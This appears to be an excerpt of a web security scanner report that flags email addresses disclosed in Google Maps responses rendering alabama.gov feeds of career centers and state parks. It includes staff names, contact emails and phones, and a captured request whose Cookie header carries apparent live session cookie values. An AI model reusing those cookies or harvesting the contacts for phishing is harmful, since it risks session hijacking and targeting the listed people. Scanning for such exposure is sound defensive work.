a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85560000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMike Fowler\x3cbr\x3e\x3ca href=\"mailto:Huntsville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eHuntsville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-851-0537\x3cbr\x3eFax: 256-851-8278",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.763246,-86.597796\x26thumb=0",photoType
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85580000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eBeverly Walker\x3cbr\x3e\x3ca href=\"mailto:Jackson.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eJackson.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-246-2453\x3cbr\x3eFax: 251-246-4797",infoWindow:{title:"Jackson Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Jackson Career Center3090 Highw
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85580000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eBeverly Walker\x3cbr\x3e\x3ca href=\"mailto:Jackson.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eJackson.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-246-2453\x3cbr\x3eFax: 251-246-4797",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.532669,-87.895375\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85610000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGina Nichols\x3cbr\x3e\x3ca href=\"mailto:Jasper.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eJasper.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-221-2576\x3cbr\x3eFax: 205-221-4595",infoWindow:{title:"Jasper Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Jasper Career Center2604 Viking
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85610000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGina Nichols\x3cbr\x3e\x3ca href=\"mailto:Jasper.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eJasper.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-221-2576\x3cbr\x3eFax: 205-221-4595",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.840787,-87.244883\x26thumb=0",photoType
...[SNIP]...
//joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75950000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eTuesday \x26amp; Wednesday\x3cbr\x3e\x3ca href=\"mailto:Gaye.Shipes@adeca.alabama.gov\" target=\"_blank\"\x3eGaye.Shipes@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-335-2300\x3cbr\x3eFax: 334-335-2306",infoWindow:{title:"Luverne Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Luverne Career Center886 Glenwo
...[SNIP]...
//joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75950000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eTuesday \x26amp; Wednesday\x3cbr\x3e\x3ca href=\"mailto:Gaye.Shipes@adeca.alabama.gov\" target=\"_blank\"\x3eGaye.Shipes@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-335-2300\x3cbr\x3eFax: 334-335-2306",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.703216,-86.250661\x26thumb=0",photoType
...[SNIP]...
ef=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85680000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eRichard Mallini\x3cbr\x3e\x3ca href=\"mailto:Mobile.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eMobile.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-461-4146\x3cbr\x3eFax: 251-461-4443",infoWindow:{title:"Mobile Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Mobile Career Center515 Springhi
...[SNIP]...
ef=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85680000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eRichard Mallini\x3cbr\x3e\x3ca href=\"mailto:Mobile.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eMobile.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-461-4146\x3cbr\x3eFax: 251-461-4443",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.704537,-88.125136\x26thumb=0",photoType
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75660000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eTammy Smith\x3cbr\x3e\x3ca href=\"mailto:Tammy.Smith@dir.alabama.gov\" target=\"_blank\"\x3eTammy.Smith@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-575-3894\x3cbr\x3eFax: 251-575-3351",infoWindow:{title:"Monroeville Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Monroeville Career Center33
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75660000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eTammy Smith\x3cbr\x3e\x3ca href=\"mailto:Tammy.Smith@dir.alabama.gov\" target=\"_blank\"\x3eTammy.Smith@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-575-3894\x3cbr\x3eFax: 251-575-3351",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.510370,-87.311818\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85700000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJames Ramsey\x3cbr\x3e\x3ca href=\"mailto:Montgomery.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eMontgomery.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-286-1746\x3cbr\x3eFax: 334-288-7286",infoWindow:{title:"Montgomery Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Montgomery Career Center1060
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85700000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJames Ramsey\x3cbr\x3e\x3ca href=\"mailto:Montgomery.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eMontgomery.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-286-1746\x3cbr\x3eFax: 334-288-7286",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.326427,-86.289811\x26thumb=0",photoType
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85740000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMike Grier\x3cbr\x3e\x3ca href=\"mailto:Opelika.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eOpelika.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-749-5065\x3cbr\x3eFax: 334-749-5031",infoWindow:{title:"Opelika Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Opelika Career Center2300 Frede
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85740000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMike Grier\x3cbr\x3e\x3ca href=\"mailto:Opelika.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eOpelika.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-749-5065\x3cbr\x3eFax: 334-749-5031",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.622032,-85.410668\x26thumb=0",photoType
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85160000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDoug Golden\x3cbr\x3e\x3ca href=\"mailto:PellCity.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3ePellCity.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-338-5440\x3cbr\x3eFax: 205-338-5443",infoWindow:{title:"Pell City Career Center - Jeff State Comm College",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Pel
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85160000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDoug Golden\x3cbr\x3e\x3ca href=\"mailto:PellCity.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3ePellCity.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-338-5440\x3cbr\x3eFax: 205-338-5443",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.606467,-86.292186\x26thumb=0",photoType
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75750000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMike Grier\x3cbr\x3e\x3ca href=\"mailto:Opelika.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eOpelika.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-214-4828\x3cbr\x3eFax: 334-214-4826",infoWindow:{title:"Phenix City Career Center - Chattahoochee Valley C",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ph
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75750000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMike Grier\x3cbr\x3e\x3ca href=\"mailto:Opelika.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eOpelika.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-214-4828\x3cbr\x3eFax: 334-214-4826",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.428809,-85.028975\x26thumb=0",photoType
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75530000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eWednesday Only\x3cbr\x3e\x3ca href=\"mailto:Sharyn.Blanton@adeca.alabama.gov\" target=\"_blank\"\x3eSharyn.Blanton@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-331-6285\x3cbr\x3eFax: 205-921-0438",infoWindow:{title:"Phil Campbell Career Center - Northwest Shoals C C",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ph
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75530000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eWednesday Only\x3cbr\x3e\x3ca href=\"mailto:Sharyn.Blanton@adeca.alabama.gov\" target=\"_blank\"\x3eSharyn.Blanton@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-331-6285\x3cbr\x3eFax: 205-921-0438",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.345681,-87.729969\x26thumb=0",photoType
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75470000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKevin Kidd\x3cbr\x3e\x3ca href=\"mailto:FortPayne.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eFortPayne.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-638-2239\x3cbr\x3eFax: 256-638-2520",infoWindow:{title:"Rainsville Career Center - Northeast Ala Comm Coll",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ra
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75470000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKevin Kidd\x3cbr\x3e\x3ca href=\"mailto:FortPayne.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eFortPayne.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-638-2239\x3cbr\x3eFax: 256-638-2520",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.494236,-85.849726\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75740000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKathy Sellers\x3cbr\x3e\x3ca href=\"mailto:Talladega.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eTalladega.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-863-8114\x3cbr\x3eFax: 334-863-8412",infoWindow:{title:"Roanoke Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Roanoke Career Center3862 Highw
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75740000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKathy Sellers\x3cbr\x3e\x3ca href=\"mailto:Talladega.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eTalladega.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-863-8114\x3cbr\x3eFax: 334-863-8412",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.149786,-85.358073\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75560000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eTeresa Mattox\x3cbr\x3e\x3ca href=\"mailto:Huntsville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eHuntsville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-574-1720\x3cbr\x3eFax: 256-574-4512",infoWindow:{title:"Scottsboro Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Scottsboro Career Center305
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75560000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eTeresa Mattox\x3cbr\x3e\x3ca href=\"mailto:Huntsville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eHuntsville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-574-1720\x3cbr\x3eFax: 256-574-4512",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.670432,-86.031088\x26thumb=0",photoType
...[SNIP]...

22.67. http://maps.google.com/maps/gx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /maps/gx?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_PARKS_STATE.kml&jsv=310c&vps=1&source=maps_api&callback=_xdc_._9gn3tnggz HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:44 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:44 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 25411

_xdc_._9gn3tnggz && _xdc_._9gn3tnggz({"name":"http://www.alabama.gov/rss/maps_PARKS_STATE.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {lat:
...[SNIP]...
tate Park",sxcn:"",name:"Joe Wheeler - State Park",description:"\x3cb\x3eJoe Wheeler - State Park\x3c/b\x3e\x3cbr\x3e201 McLean Dr.\x3cbr\x3eRogersville, AL 35652\x3cbr\x3e256-247-5466\x3cbr\x3e\x3cbr\x3ejoewheelerstpk@mindspring.com",infoWindow:{title:"Joe Wheeler - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Joe Wheeler - State Park201 McLean Dr.Rogersville, AL 35652256-247-5466joewheele",dscr:"\x3cb\x3eJoe Wheeler - State Park\x3c/b\x3e\x3cbr\x3e201 McLean Dr.\x3cbr\x3eRogersville, AL 35652\x3cbr\x3e256-247-5466\x3cbr\x3e\x3cbr\x3ejoewheelerstpk@mindspring.com",dscr_dir:"ltr"},b_s:0,elms:[6,1,12,1,9,2,5]},{id:"B",fid:"ga86bc5f83f6eb7c8",latlng:{lat:34.393604000000003,lng:-86.194417000000001},image:"http://www.alabama.gov/images/mapMarkers/PARKS_STATE_icon.p
...[SNIP]...
tersville - State Park",description:"\x3cb\x3eLake Guntersville - State Park\x3c/b\x3e\x3cbr\x3e7966 AL Hwy. 227\x3cbr\x3eGuntersville, AL 35976\x3cbr\x3e256-571-5444\x3cbr\x3e256-571-9043 (fax)\x3cbr\x3eguntersvillestpk@dcnr.alabama.gov",infoWindow:{title:"Lake Guntersville - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Lake Guntersville - State Park7966 AL Hwy. 227Guntersville, AL 35976256-571-5444",dscr:"\x3cb\x3eLake Guntersville - State Park\x3c/b\x3e\x3cbr\x3e7966 AL Hwy. 227\x3cbr\x3eGuntersville, AL 35976\x3cbr\x3e256-571-5444\x3cbr\x3e256-571-9043 (fax)\x3cbr\x3eguntersvillestpk@dcnr.alabama.gov",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.393604,-86.194417\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"C",fid:"g0a5505e1c03e80c5
...[SNIP]...
e:"Lake Lurleen - State Park",description:"\x3cb\x3eLake Lurleen - State Park\x3c/b\x3e\x3cbr\x3e13226 Lake Lurleen Rd.\x3cbr\x3eCoker, AL 35452\x3cbr\x3e205-339-1558\x3cbr\x3e205-339-8885 (fax)\x3cbr\x3elakelurleenstpk@mindspring.com",infoWindow:{title:"Lake Lurleen - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Lake Lurleen - State Park13226 Lake Lurleen Rd.Coker, AL 35452205-339-1558205-33",dscr:"\x3cb\x3eLake Lurleen - State Park\x3c/b\x3e\x3cbr\x3e13226 Lake Lurleen Rd.\x3cbr\x3eCoker, AL 35452\x3cbr\x3e205-339-1558\x3cbr\x3e205-339-8885 (fax)\x3cbr\x3elakelurleenstpk@mindspring.com",dscr_dir:"ltr"},b_s:0,elms:[6,1,12,1,9,2,5]},{id:"D",fid:"gee31597168d0b6fb",latlng:{lat:33.337834000000001,lng:-86.731910999999997},image:"http://www.alabama.gov/images/mapMarkers/PARKS_STATE_icon.p
...[SNIP]...
"",name:"Oak Mountain - State Park",description:"\x3cb\x3eOak Mountain - State Park\x3c/b\x3e\x3cbr\x3e200 Terrace Dr.\x3cbr\x3ePelham, AL 35124\x3cbr\x3e205-620-2520\x3cbr\x3e205-620-2531 (fax)\x3cbr\x3eoakmountainstpk@mindspring.com",infoWindow:{title:"Oak Mountain - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Oak Mountain - State Park200 Terrace Dr.Pelham, AL 35124205-620-2520205-620-2531",dscr:"\x3cb\x3eOak Mountain - State Park\x3c/b\x3e\x3cbr\x3e200 Terrace Dr.\x3cbr\x3ePelham, AL 35124\x3cbr\x3e205-620-2520\x3cbr\x3e205-620-2531 (fax)\x3cbr\x3eoakmountainstpk@mindspring.com",dscr_dir:"ltr"},b_s:0,elms:[6,1,12,1,9,2,5]},{id:"E",fid:"gf3d0f9bbd51cc7e6",latlng:{lat:32.358947000000001,lng:-87.786534000000003},image:"http://www.alabama.gov/images/mapMarkers/PARKS_STATE_icon.p
...[SNIP]...
n:"",name:"Chickasaw - State Park",description:"\x3cb\x3eChickasaw - State Park\x3c/b\x3e\x3cbr\x3e26955 U.S. Hwy. 43\x3cbr\x3eGallion, AL 36742\x3cbr\x3e334-295-8230\x3cbr\x3e334-295-8230 (fax)\x3cbr\x3egulfstpk@gulftel.com",infoWindow:{title:"Chickasaw - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Chickasaw - State Park26955 U.S. Hwy. 43Gallion, AL 36742334-295-8230334-295-823",dscr:"\x3cb\x3eChickasaw - State Park\x3c/b\x3e\x3cbr\x3e26955 U.S. Hwy. 43\x3cbr\x3eGallion, AL 36742\x3cbr\x3e334-295-8230\x3cbr\x3e334-295-8230 (fax)\x3cbr\x3egulfstpk@gulftel.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.358947,-87.786534\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"F",fid:"g67798e75f53d6655
...[SNIP]...
ame:"Roland Cooper - State Park",description:"\x3cb\x3eRoland Cooper - State Park\x3c/b\x3e\x3cbr\x3e285 Deer Run Dr.\x3cbr\x3eCamden , AL 36726\x3cbr\x3e334-682-4838\x3cbr\x3e334-682-4050 (fax)\x3cbr\x3erolandcooperstatepark@frontiernet.net",infoWindow:{title:"Roland Cooper - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Roland Cooper - State Park285 Deer Run Dr.Camden , AL 36726334-682-4838334-682-4",dscr:"\x3cb\x3eRoland Cooper - State Park\x3c/b\x3e\x3cbr\x3e285 Deer Run Dr.\x3cbr\x3eCamden , AL 36726\x3cbr\x3e334-682-4838\x3cbr\x3e334-682-4050 (fax)\x3cbr\x3erolandcooperstatepark@frontiernet.net",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.055736,-87.245082\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"G",fid:"gc670af9cd0cea8f3
...[SNIP]...
name:"Meaher - State Park",description:"\x3cb\x3eMeaher - State Park\x3c/b\x3e\x3cbr\x3e5200 Battleship Pkwy. E.\x3cbr\x3eSpanish Fort, AL 36577\x3cbr\x3e251-626-5529\x3cbr\x3e251-626-5529 (fax)\x3cbr\x3egulfstpk@gulftel.com",infoWindow:{title:"Meaher - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Meaher - State Park5200 Battleship Pkwy. E.Spanish Fort, AL 36577251-626-5529251",dscr:"\x3cb\x3eMeaher - State Park\x3c/b\x3e\x3cbr\x3e5200 Battleship Pkwy. E.\x3cbr\x3eSpanish Fort, AL 36577\x3cbr\x3e251-626-5529\x3cbr\x3e251-626-5529 (fax)\x3cbr\x3egulfstpk@gulftel.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.675549,-87.936941\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"H",fid:"g6dfed8a772415df7
...[SNIP]...
,sxcn:"",name:"Gulf - State Park",description:"\x3cb\x3eGulf - State Park\x3c/b\x3e\x3cbr\x3e20115 State Hwy. 135\x3cbr\x3eGulf Shores, AL 36542\x3cbr\x3e251-948-7275\x3cbr\x3e251-948-7726 (fax)\x3cbr\x3egulfstpk@gulftel.com",infoWindow:{title:"Gulf - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Gulf - State Park20115 State Hwy. 135Gulf Shores, AL 36542251-948-7275251-948-77",dscr:"\x3cb\x3eGulf - State Park\x3c/b\x3e\x3cbr\x3e20115 State Hwy. 135\x3cbr\x3eGulf Shores, AL 36542\x3cbr\x3e251-948-7275\x3cbr\x3e251-948-7726 (fax)\x3cbr\x3egulfstpk@gulftel.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.266925,-87.639441\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"I",fid:"g77005b7a800c1b0f
...[SNIP]...
"",name:"Monte Sano - State Park",description:"\x3cb\x3eMonte Sano - State Park\x3c/b\x3e\x3cbr\x3e5105 Nolen Ave.\x3cbr\x3eHuntsville, AL 35801\x3cbr\x3e256-534-3757\x3cbr\x3e256-539-7069 (fax)\x3cbr\x3emontesanostpk@dcnr.alabama.gov",infoWindow:{title:"Monte Sano - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Monte Sano - State Park5105 Nolen Ave.Huntsville, AL 35801256-534-3757256-539-70",dscr:"\x3cb\x3eMonte Sano - State Park\x3c/b\x3e\x3cbr\x3e5105 Nolen Ave.\x3cbr\x3eHuntsville, AL 35801\x3cbr\x3e256-534-3757\x3cbr\x3e256-539-7069 (fax)\x3cbr\x3emontesanostpk@dcnr.alabama.gov",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.737266,-86.513579\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"J",fid:"g5673873518a8190d
...[SNIP]...
